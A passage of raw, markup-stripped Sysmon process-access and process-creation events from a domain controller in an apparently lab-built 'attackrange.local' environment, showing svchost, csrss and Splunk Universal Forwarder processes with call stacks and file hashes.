STEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9108-6005-6F01-00000000A301}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9108-6005-6F01-00000000A301}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.704{59A5CD1D-9108-6005-6F01-00000000A301}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.547{59A5CD1D-9109-6005-7001-00000000A301}37321512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9109-6005-7001-00000000A301}3732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9109-6005-7001-00000000A301}3732C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9109-6005-7001-00000000A301}3732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-9109-6005-7001-00000000A301}3732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-910A-6005-7101-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:46.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
